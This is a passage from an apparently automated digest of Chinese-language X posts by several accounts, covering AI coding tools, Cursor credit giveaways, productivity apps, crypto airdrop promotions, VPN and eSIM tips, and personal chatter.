page…\n[原文链接](https://x.com/frxiaobei/status/2048805789788413984)\n\n**[2026-04-27T16:44:03+00:00]**\n> Amazing\n[原文链接](https://x.com/frxiaobei/status/2048805385537306677)\n\n**[2026-04-27T16:32:39+00:00]**\n> OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。 但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。 像极了刚走向社会的二愣子。\n[原文链接](https://x.com/frxiaobei/status/2048802517237350599)\n\n**[2026-04-27T16:24:39+00:00]**\n> OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。 😤 虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。\n[原文链接](https://x.com/frxiaobei/status/2048800504206282887)\n\n**[2026-04-26T19:41:23+00:00]**\n> RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension. We're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more …\n[原文链接](https://x.com/frxiaobei/status/2048487623250063516)\n\n**[2026-04-26T11:39:25+00:00]**\n> RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的! 2:但是甲方需要 4K 图。或者 PSD 图层! 3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。 MD 居然给我做了!改给了我一个分层压缩包! 4:里面的图片居然是 4K 尺寸的! 5:所以我们能通过这个方法获得 GPT 的 4K 图片!\n[原文链接](https://x.com/frxiaobei/status/2048366332639674706)\n\n**[2026-04-26T08:35:15+00:00]**\n> RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI\n[原文链接](https://x.com/frxiaobei/status/2048319988826820941)\n\n---\n\n### ✅ @gkxspace — 余温(13 条)\n\n**[2026-05-01T12:00:26+00:00]**\n> Gemini会员每个月能领谷歌云额度,别忘啦,Pro10美金/月,Ultra100美金/月 一次有效期一年,用不到就先攒着吧😄 https://me.developers.google.com/benefits?hl=zh-cn\n[原文链接](https://x.com/gkxspace/status/2050183561316016186)\n\n**[2026-04-30T02:35:33+00:00]**\n> 截图软件就推荐 PixPin,功能很丰富: 1、截图一键贴在桌面:当做临时便签,很多博主会用 2、长截图:整个网页/长文档一张图就搞定了 3、OCR:截图文字可拷贝,并且完全本地识别 4、GIF图/录屏:录一段操作、制作GIF图 Win / Mac 都有,而且也免费。\n[原文链接](https://x.com/gkxspace/status/2049679016764833893)\n\n**[2026-04-29T01:38:07+00:00]**\n> R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人” 技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作 更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性\n[原文链接](https://x.com/gkxspace/status/2049302176900501544)\n\n**[2026-04-28T14:39:43+00:00]**\n> 刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。 我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。 Claude Code、Skills、OpenClaw,不都在向全自动化发展。 如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。 现在 AI Coding 的能力已经非常非常强了,你做出…\n[原文链接](https://x.com/gkxspace/status/2049136483106230523)\n\n**[2026-04-28T11:08:05+00:00]**\n> 这个 Codex 教程很不错,新手值得一看。 作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。 5 个有用的技巧: ①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。 ②插件是别人给你的能力,skills是你自己造的能…\n[原文链接](https://x.com/gkxspace/status/2049083226463797284)\n\n**[2026-04-28T10:26:08+00:00]**\n> 我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下: 1. Obsidian:用来做内容存档、搭建个人知识库 2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商 3. Codex :最近更新很频繁,体验也越来越好,而且不封号 4. Ghostty:一个非常丝滑的终端,推荐~ 5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽 …\n[原文链接](https://x.com/gkxspace/status/2049072666385006919)\n\n**[2026-04-26T14:41:16+00:00]**\n> 牛逼,卡神又出教程了 4美分/天、KiteSim香港卡,免实名+独享虚拟号 马上跟着教程申请一张!!!\n[原文链接](https://x.com/gkxspace/status/2048412096665145411)\n\n**[2026-04-25T16:04:44+00:00]**\n> R to @gkxspace: agent.creao.ai/signup?ref=Ws…\n[原文链接](https://x.com/gkxspace/status/2048070713601376712)\n\n**[2026-04-25T13:45:29+00:00]**\n> R to @gkxspace: x.com/gkxspace/status/204803…\n[原文链接](https://x.com/gkxspace/status/2048035672078844248)\n\n**[2026-04-25T13:44:55+00:00]**\n> 用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。 简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。 我的提示词: 我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套\n[原文链接](https://x.com/gkxspace/status/2048035527459319854)\n\n**[2026-04-25T13:32:58+00:00]**\n> 生财有术、得到新商学,哪个更好一些 最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下 你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔\n[原文链接](https://x.com/gkxspace/status/2048032521942626343)\n\n**[2026-04-25T06:15:53+00:00]**\n> 去了趟书店,被震惊了,到底谁在买这些书啊😅\n[原文链接](https://x.com/gkxspace/status/2047922526685155786)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @gkxspace: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/204773843982373309…\n[原文链接](https://x.com/gkxspace/status/2047891848908472433)\n\n---\n\n### ✅ @Stv_Lynn — Steven Lynn(9 条)\n\n**[2026-05-01T18:47:37+00:00]**\n> Media\n[原文链接](https://x.com/Stv_Lynn/status/2050286033552736527)\n\n**[2026-04-29T23:26:38+00:00]**\n> 今日在大阪,欢迎约饭👋\n[原文链接](https://x.com/Stv_Lynn/status/2049631472693448778)\n\n**[2026-04-29T16:12:16+00:00]**\n> 到香港后发现带的是大陆转英标的插座,崩溃\n[原文链接](https://x.com/Stv_Lynn/status/2049522162411995640)\n\n**[2026-04-27T10:37:36+00:00]**\n> Image\n[原文链接](https://x.com/Stv_Lynn/status/2048713165232644251)\n\n**[2026-04-25T18:40:34+00:00]**\n> R to @Stv_Lynn: github.com/stvlynn/quote-bud…\n[原文链接](https://x.com/Stv_Lynn/status/2048109932751560818)\n\n**[2026-04-25T18:40:33+00:00]**\n> R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像\n[原文链接](https://x.com/Stv_Lynn/status/2048109929203212615)\n\n**[2026-04-25T18:40:31+00:00]**\n> Cursor 送的 10000 刀,我拿来做了什么 昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录 1. 写了个主页 想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构 (文案请忽略不代表最终效果) 感觉吃上细糠了!\n[原文链接](https://x.com/Stv_Lynn/status/2048109919266852875)\n\n**[2026-04-25T12:08:29+00:00]**\n> RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。 从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工…\n[原文链接](https://x.com/Stv_Lynn/status/2048011261473128477)\n\n**[2026-04-25T05:23:57+00:00]**\n> 忘了说了其实我也有👉👈 感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!\n[原文链接](https://x.com/Stv_Lynn/status/2047909458484040105)\n\n---\n\n### ✅ @chuxiaeth — 初夏(10 条)\n\n**[2026-04-30T01:50:25+00:00]**\n> ✅好用的VPN梯子推荐 最近很多朋友问我梯子怎么选,我自己踩过不少坑。快连以前还行,但现在真的太卡了,除了还没跑路,基本什么毛病都占全了,高峰期根本连不上。 我自己试下来,目前还算稳定的有三个,分享给大家参考: 1️⃣ QuickQ——整体运行比较流畅,日常刷推、看行情、视频都不太会断。缺点是偏贵,一年大概800元,最多同时挂三台设备,适合个人主力使用。 2️⃣ 奶昔——老牌子之一,速度和稳定性…\n[原文链接](https://x.com/chuxiaeth/status/2049667657251934282)\n\n**[2026-04-30T00:46:21+00:00]**\n> 🧠 你以为的币圈财富自由: 在 AAVE 里存 500 万美金,每天躺赚几百刀利息,结果 AAVE 差点出大问题,钱包差点归零,每天那点利息最后发现是把本金放在火山口上烤🔥 👇 真正的币圈财富自由: 500 万美金,全放链上钱包,不存任何协议,不图那点所谓的稳定收益。每天拿 1000 美金冲链,Solana 土狗、ETH 土狗、BSC 土狗,轮着扫🧵 💥 核心纪律(必须遵守): 1. 亏损 20…\n[原文链接](https://x.com/chuxiaeth/status/2049651534003351701)\n\n**[2026-04-29T04:52:50+00:00]**\n> 🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯 策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊 Tria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=…\n[原文链接](https://x.com/chuxiaeth/status/2049351176433623539)\n\n**[2026-04-28T08:48:42+00:00]**\n> Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。\n[原文链接](https://x.com/chuxiaeth/status/2049048148660965739)\n\n**[2026-04-28T08:38:27+00:00]**\n> 开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。 #TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。\n[原文链接](https://x.com/chuxiaeth/status/2049045566857064461)\n\n**[2026-04-28T08:30:58+00:00]**\n> R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误\n[原文链接](https://x.com/chuxiaeth/status/2049043685094907944)\n\n**[2026-04-28T08:25:44+00:00]**\n> 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海…\n[原文链接](https://x.com/chuxiaeth/status/2049042369530777747)\n\n**[2026-04-26T23:40:41+00:00]**\n> - @RiverdotInc 第五季创作者排名战正式打响🏆 赛季时间:4月22日 → 26年Q2结束📅 这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ 另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 @River4fun 💧 我也已经加入到第五季的战斗\n[原文链接](https://x.com/chuxiaeth/status/2048547844982976544)\n\n**[2026-04-26T23:33:15+00:00]**\n> - @ferra_protocol 居然也上贵金属永续合约了🥇 现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 交互链接: https://ferra.ag?code=tBYQfU0aq 进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀\n[原文链接](https://x.com/chuxiaeth/status/2048545974747070599)\n\n**[2026-04-26T02:36:06+00:00]**\n> 好久不见,宝子们,近来可好啊\n[原文链接](https://x.com/chuxiaeth/status/2048229604784308266)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @wolfyxbt — 杀破狼(12 条)\n\n**[2026-04-27T13:59:57+00:00]**\n> 最近想玩链游的可以看看 @RealGoOfficial 这个游戏 他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。 他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如…\n[原文链接](https://x.com/wolfyxbt/status/2048764088193569049)\n\n**[2026-04-27T01:55:58+00:00]**\n> 不要骂我了,山寨季已经来过了 $TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。 觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。 山寨币是赚钱容易而已,不是所有人都赚钱。\n[原文链接](https://x.com/wolfyxbt/status/2048581892333867398)\n\n**[2026-04-26T04:01:04+00:00]**\n> 嗨 @nikitabier @elonmusk 你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。 我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。\n[原文链接](https://x.com/wolfyxbt/status/2048250984644960630)\n\n**[2026-04-26T02:11:07+00:00]**\n> 卧槽,川普又被枪击了 😱\n[原文链接](https://x.com/wolfyxbt/status/2048223317019316568)\n\n**[2026-04-25T15:08:21+00:00]**\n> 因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。\n[原文链接](https://x.com/wolfyxbt/status/2048056527731454048)\n\n**[2026-04-25T13:32:07+00:00]**\n> R to @wolfyxbt: Image\n[原文链接](https://x.com/wolfyxbt/status/2048032308637442215)\n\n**[2026-04-25T13:30:27+00:00]**\n> 2019 年,孙哥放了巴菲特的鸽子; 2026 年,嗯哼放了特朗普的鸽子。 币圈真是个神奇的地方!\n[原文链接](https://x.com/wolfyxbt/status/2048031889789972748)\n\n**[2026-04-25T10:03:02+00:00]**\n> 虽然比特币回到 77,000 了,但是我还是非常悲观的 我理想中的抄底价格是 35,000 的比特币 感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。 这种底我根本不敢抄呀,抄在半山腰至少得难受一年。 感觉现在这种行情像是跌太…\n[原文链接](https://x.com/wolfyxbt/status/2047979690623955107)\n\n**[2026-04-25T08:01:04+00:00]**\n> 我靠 Cursor 刚刚送了我 10,000 美金的额度! 感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!\n[原文链接](https://x.com/wolfyxbt/status/2047948998250840240)\n\n**[2026-04-25T05:22:04+00:00]**\n> 我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。 平均算下来,每 1 次曝光有 0.000136 美金的收益; 每 1 万次曝光 1.36 美金的收益。\n[原文链接](https://x.com/wolfyxbt/status/2047908983101628720)\n\n**[2026-04-25T03:15:14+00:00]**\n> R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据\n[原文链接](https://x.com/wolfyxbt/status/2047877064104284194)\n\n**[2026-04-25T02:27:20+00:00]**\n> 卧槽!牛逼牛逼! 这两周的工资涨到了 1799 美金! Thank you Elon Musk!\n[原文链接](https://x.com/wolfyxbt/status/2047865010182148284)\n\n---\n\n### ✅ @runes_leo — Leo(20 条)\n\n**[2026-05-01T15:03:25+00:00]**\n> 终于。 Claude Code 长 session 跑久了,/resume 卡到怀疑人生,每次启动还得等最慢那个 MCP 拖几秒到十几秒——CC 重度用户应该都熟。这次一波修了。 实打实有体感的两条: • /resume 在 40MB+ session 上快了 67%,50MB 的 /branch 上限也砍了——我自己 subagent 转录飙到过 122M(人家 50MB 上限的两倍多),主 …\n[原文链接](https://x.com/runes_leo/status/2050229609795407876)\n\n**[2026-05-01T08:17:19+00:00]**\n> Anthropic 这招真狠,所有 Claude Code 用户都该看一眼。 @theo 做了个最干净的实验: 建一个空 Git 仓库,commit 只放一行 JSON: {\"schema\": \"openclaw.inbound_meta.v1\"} 调用官方 Claude Code —— 直接报错\"out of extra usage\"。 要么拒绝请求,要么强制多收一份钱。 0 行业务代码,只因…\n[原文链接](https://x.com/runes_leo/status/2050127414630469937)\n\n**[2026-05-01T06:14:26+00:00]**\n> Karpathy 这场 Sequoia 演讲把 AI 编程下个阶段讲透了,最有感触的是第 6 条。 1. Software 3.0 来了。 1.0 写代码,2.0 训神经网络,3.0 在 LLM 的 context 里用自然语言\"编程\"。 2. 2025-12 是拐点。 生成代码块变大变连贯,编程的最小单位从\"写代码\"升级到\"委派任务\"。 3. 神经网络会成主计算层。 未来不是 CPU 上跑神经…\n[原文链接](https://x.com/runes_leo/status/2050096487967695197)\n\n**[2026-05-01T00:38:00+00:00]**\n> 38k 星的 skill 仓库。 上周抄了 1 个 grill-me,今天又加了另外 2 个。 一个是 /tdd 思路。 动手前先写一行——跑完应该长啥样。 对得上才往下走。 加进自己的自检流程,只用于策略代码或 API 调用那类—— 跑了对不对要 grep log 才知道的场景。 skill 没装,精华抄过来了。 另一个是他 SKILL.md 的渐进式骨架。 照着写了个模板,下次新写 skil…\n[原文链接](https://x.com/runes_leo/status/2050011821352829116)\n\n**[2026-04-30T11:23:46+00:00]**\n> R to @runes_leo: github.com/runesleo/claude-v…\n[原文链接](https://x.com/runes_leo/status/2049811948653752753)\n\n**[2026-04-30T11:23:46+00:00]**\n> 开源视频管线 claude-video-kit 升级 比上一版多了: · 加了一个真实跑通的示例(就是上面这条视频的 script.json,10 个 slide / 46 秒,clone 完改改字段就能跑自己的) · Remotion / ffmpeg 版本锁定 + 音频标准化配方 · 声纹 ref 改环境变量 · v0.2 视觉路线图(双语小标签 / 双色高亮 / emoji 数据卡 / 双…\n[原文链接](https://x.com/runes_leo/status/2049811945528893682)\n\n**[2026-04-30T10:02:00+00:00]**\n> Warp 开源那天我没换。 为啥?看了眼 license 直接乐了。 repo 是 2021 年 7 月就建了,闭源跑了快 5 年,4/28 突然开源——但选的不是 MIT 也不是 Apache,是 AGPL-3.0。 AGPL 就是那个专门防 AWS 白嫖的协议。 你想啊,开源数据库选 MIT,AWS 直接拿去包成 RDS 赚几十亿,你一分钱看不到。选 AGPL,AWS 必须把改动也吐出来——…\n[原文链接](https://x.com/runes_leo/status/2049791371364479224)\n\n**[2026-04-30T07:00:14+00:00]**\n> R to @runes_leo: 完整版(英文 / 3 小时干货): https://www.youtube.com/watch?v=7xTGNNLPyMI 强烈建议看完整版。\n[原文链接](https://x.com/runes_leo/status/2049745624703320340)\n\n**[2026-04-30T07:00:13+00:00]**\n> R to @runes_leo: 刚实测,第一反应仍然是「9.11 更大」,靠把 9.9 写成 9.90 这一步才把自己绕回来。😂\n[原文链接](https://x.com/runes_leo/status/2049745621159145603)\n\n**[2026-04-30T07:00:07+00:00]**\n> ChatGPT 能解 PhD 物理题,9.11 比 9.9 这道小学数学题,第一反应还是会答错。 不是它笨,是它根本看不见这串字符。 Karpathy 三小时讲 LLM 的新视频里专门讲了原因——做了个 60 秒解读 👇\n[原文链接](https://x.com/runes_leo/status/2049745599105572981)\n\n**[2026-04-30T06:07:18+00:00]**\n> 看了一圈大 V 解读 Cursor SDK 的爆款推, 都在讲它多牛、什么操作系统、范式转移。 我说说一夜实测的真实数据。 我手搓了 5 天的 AI 自动化, 今天被官方版替了。 5 天前用 Cursor 命令行 + bash 脚本搓的, 让它在后台 7×24 跑各种重复但费脑的活 (拆解、扫描、整理这类)。 烧 $10K 免费额度。 跑得不算丝滑: 经常卡顿,产出格式飘移, 脚本日志显示我跑「…\n[原文链接](https://x.com/runes_leo/status/2049732305829454015)\n\n**[2026-04-30T04:34:09+00:00]**\n> R to @runes_leo: 想体验 Typeless 可以走这个链接🫡 https://www.typeless.com/?via=leo-x\n[原文链接](https://x.com/runes_leo/status/2049708861679153445)\n\n**[2026-04-30T04:34:08+00:00]**\n> 搞 AI 的同行 +1,但有个反差:我 Dock 上没有 Claude 和 Codex 的 App 图标,就一个终端做入口。 用 Ghostty 还得专门感谢刷到 @wangray 的这个推荐,从 iTerm 迁过来体验确实有提升。 我每天就 2 个图标: 1. Ghostty 终端:Claude Code + Codex + ssh + pm2 一切的一切唯一入口 2. Typeless:语音…\n[原文链接](https://x.com/runes_leo/status/2049708857598107988)\n\n**[2026-04-30T02:16:00+00:00]**\n> 搭了一条管线:B站 3.5h 长访谈 → 30 分钟出文章 + http://leolabs.me 网站部署。 刚跑通的是张小珺采访小米罗福莉 3.5h 视频。零外部 API 成本,全本地: → B站 API 绕 412 拿音频 → mlx-whisper(small 模型,31x 实时,本地 7min 转完) → Haiku subagent 分章节摘要 → 主线程 Opus 合稿 + 卡片 …\n[原文链接](https://x.com/runes_leo/status/2049674096041189620)\n\n**[2026-04-29T23:27:00+00:00]**\n> 没建工作流前,每天起床打开 X 刷一会儿就开始焦虑——爆款看不完、KOL 推文跟不上、PM 平台又升级了不知道哪条该 follow。 现在每天 30 分钟跑一次 /today + /morning,把当天外部信息流梳成可执行清单: 合计 31 条 · 预计 6-8h 消化完 每条都明确动作:写推 / 评估装不装 / 扫一眼跳过 / 私享给付费读者 / 进 backlog 推到周日。 跑完那一刻焦…\n[原文链接](https://x.com/runes_leo/status/2049631565710528661)\n\n**[2026-04-29T15:38:00+00:00]**\n> 今天才发现自己 80.8% 的 Claude Code skill 是装废的。 读 Tw93 这篇学到了,description 写\"用于 X / X workflow\"是\"功能介绍型\",AI 主线程根本看不到何时该调它。 52 个 skill 一直纳闷 codeburn 这个月 subagent 调用率为啥才 0.18%,可能的原因找到了。 今天全改成 Use when + NOT when,…\n[原文链接](https://x.com/runes_leo/status/2049513537966674317)\n\n**[2026-04-29T13:16:00+00:00]**\n> Day 5 — Cursor 送的 $10K 刚烧到 $164,刚 1.64%。慢得我自己都着急。 本来以为\"路还长\",今天才发现不是慢的问题,是方向错了。 我现在 3 个 worker 并行在跑:白天我自己开 Claude / Codex 终端推任务,夜里 Codex loop 烧策略 / 数据基座的额度,Cursor 24/7 跑 daemon 一直不停。 之前我把 Cursor 这个 lo…\n[原文链接](https://x.com/runes_leo/status/2049477802978664657)\n\n**[2026-04-29T11:27:00+00:00]**\n> Polymarket V2 cutover 24 小时观察。 把十几个策略账户的 USDC.e 全部迁到 pUSD,verify + smoke PASS。一起来观察下第一天的市场反应。 --- 【数据层】@lnkybtc 秋田老师的链上数据最直观: • V2 部署后 4 小时,pUSD 发行 1.7 亿美元,186 万笔转账,68,686 个持有地址 • 6 小时内,PM TVL 4.5 亿里…\n[原文链接](https://x.com/runes_leo/status/2049450372285046792)\n\n**[2026-04-29T10:38:03+00:00]**\n> Anthropic ships changelogs. OpenAI ships vibes.\n[原文链接](https://x.com/runes_leo/status/2049438052310020226)\n\n**[2026-04-29T09:40:13+00:00]**\n> Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。 但通知再快也是要人读的。我并不想读。 我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。 懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / …\n[原文链接](https://x.com/runes_leo/status/2049423498494566836)\n\n---\n\n### ⚠️ @oranges — 比特币橙子(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @realNyarime — 奶昔(20 条)\n\n**[2026-05-01T14:03:27+00:00]**\n> 近期市面上出现eLink可编程eUICC实体卡,芯片布局上与eSTK极其相似,暂不明确该卡的EID及制造厂商 不做推荐,我已在他们淘宝店「eLink Store」下单 目前市面上的实体eSIM卡均不可缺少的功能: 支持自定义ARA-M权限配置 兼容各类写卡软件及读卡器读写 并可通过STK菜单实现eSIM Profile下载、切换与管理\n[原文链接](https://x.com/realNyarime/status/2050214520162038238)\n\n**[2026-05-01T09:17:00+00:00]**\n> 那些餐饮店的饮料还以为是做慈善 原来进货价就1毛钱一瓶水实测可以买很多瓶 自己有多少个号买多少个号,应该不是敌敌畏 0.1🉐百花蜂蜜500g https://u.jd.com/fOY2tiP 0.1🉐弱碱苏打水300ml*1瓶 https://u.jd.com/fgYnQ2p 0.1🉐金银花罗汉果茶360ml*1瓶 https://u.jd.com/fOYTQzZ 0.1🉐百合绿豆水400ml*…\n[原文链接](https://x.com/realNyarime/status/2050142432088526883)\n\n**[2026-05-01T08:55:20+00:00]**\n> 从昨天开始有不少网友反馈iOS推送异常,原因未知 在对 http://push.apple.com 分流后仍无法接到Telegram等App推送,切换外区Apple ID后恢复,但CN直连失败 这是Apple自App Store对中国大陆IP重定向至/cn(国区商店)后,进一步限制移动端设备推送,暂不影响macOS\n[原文链接](https://x.com/realNyarime/status/2050136980454031800)\n\n**[2026-05-01T07:02:32+00:00]**\n> 小米之家河南限定五一礼物钧瓷已拿到 还送了水和王者明信片,汝窑会更好看,天青色 对了,其实周杰伦的青花瓷这首歌最初写词是写的汝瓷 不知道为啥换名字了 青花瓷是靛蓝或者宝石蓝,不是天青色\n[原文链接](https://x.com/realNyarime/status/2050108592246984780)\n\n**[2026-05-01T06:32:41+00:00]**\n> 跟推友问好👋 有一个问题想问大家🙋 放假都没出去,看了一圈好像没什么好玩的地方🤔 所以想问问,有什么值得两人旅行的地方?😳\n[原文链接](https://x.com/realNyarime/status/2050101082433720730)\n\n**[2026-05-01T05:42:39+00:00]**\n> 避雷一下中国电信英国(CTExcel UK) 虽然补卡费用30块(3英镑),但为了恶心你一下增加了库存机制 头一次听到补eSIM还能有“库存”这一说法的,这eSIM又不是实体卡,居然还能补卡卡池库存不足🤣🤣🤣\n[原文链接](https://x.com/realNyarime/status/2050088491925815667)\n\n**[2026-05-01T03:00:08+00:00]**\n> 至于说eSIM太贵,如果愿意折腾也可以省钱。分享一期中国大陆5天无限流量(每天5G高速)仅需25THB约5.24CNY 先领取优惠👇🏻 https://s.ee/superalink 再购买中国大陆套餐👇🏻 https://s.ee/superalinkcn 这里需要右上角改成THB(泰铢),语言还是保持中文。确定支付金额是否为:25泰铢,约5.24CNY,如果你发现价格不对,请回到第一个链接领…\n[原文链接](https://x.com/realNyarime/status/2050047591191384162)\n\n**[2026-04-30T18:49:33+00:00]**\n> 还得是投行的女高管,操控股价有水平的\n[原文链接](https://x.com/realNyarime/status/2049924132037693573)\n\n**[2026-04-30T17:00:21+00:00]**\n> 这下不止中国大陆,连香港到美的互联也要玩烂了! FCC表决撤销中资运营商的一揽子授权之提议,目的是堵住 2022 年的法律漏洞:即使「中资运营商」的通信牌照被撤销,它们仍可根据一揽子授权(Blanket Authority)自动获得美国国内的州际电信服务资质 会议中最激进的部分是关于禁止互联(Interconnection)的讨论,即讨论将从物理上禁止Verizon、AT&T等美资运营商与中资运…\n[原文链接](https://x.com/realNyarime/status/2049896651989614721)\n\n**[2026-04-30T16:33:28+00:00]**\n> N26关门了,中港澳台全部不接受\n[原文链接](https://x.com/realNyarime/status/2049889887684616218)\n\n**[2026-04-30T15:31:15+00:00]**\n> 所以GPT的Plus和Team额度差多少\n[原文链接](https://x.com/realNyarime/status/2049874226778452072)\n\n**[2026-04-30T14:23:38+00:00]**\n> R to @realNyarime: 4月29日,据广州市天河区投资服务中心官方公众号“投资天河”发布消息,科技巨头谷歌已于28日正式签订合同,入驻位于天河CBD珠江新城的城市地标广州国际金融中心(西塔),将率先落地跨境数智赋能服务创新项目,预计今年第三季度正式投入运营。谷歌方面将联合各方优势资源,推出多项创新科技服务。 据了解,谷歌将在广州天河整合全球领先的科技资源,为内地跨境电商企业提供近距…\n[原文链接](https://x.com/realNyarime/status/2049857210659070441)\n\n**[2026-04-30T14:22:45+00:00]**\n> 据羊城晚报报道,谷歌落地广州,入驻位于天河 CBD 珠江新城地标广州国际金融中心(西塔) 将率先落地跨境数智赋能服务创新项目,主打跨境电商业务,预计今年 Q3 正式投入运营 谷歌方面将联合各方优势资源,推出多项国内首创科技服务\n[原文链接](https://x.com/realNyarime/status/2049856990957236483)\n\n**[2026-04-30T13:13:12+00:00]**\n> 这下压力给到CAAC了, 不过当年不予公开的原因是,可能危及国家安全、社会稳定😣\n[原文链接](https://x.com/realNyarime/status/2049839485610029262)\n\n**[2026-04-30T12:41:34+00:00]**\n> 88code以前也是L站的富可敌国之一,后面因为N佬(另一位富可敌国)的PrivNode以10元出售66万债务影响,一直都没退款 主体是北京灵伊智能科技有限公司,本质上是AI中转站,去年年底就有多名佬友反应高峰不可用、故障率高等问题,特别是挂了没有通知 借雪踏乌云佬的帖提一嘴,采买第三方API服务应当多留意一下,避开这类有前科的AI中转站以免造成不必要的经济损失\n[原文链接](https://x.com/realNyarime/status/2049831528109326356)\n\n**[2026-04-30T08:18:44+00:00]**\n> 下载NVIDIA App,领取《鸣潮》游戏礼包 包含游戏道具:高级能源核心 x 2、高级能量袋 x 1、贝币 x 20000。 数量有限,兑完即止。(本活动仅适用于中国大陆用户) 本活动将于 2026 年 6 月 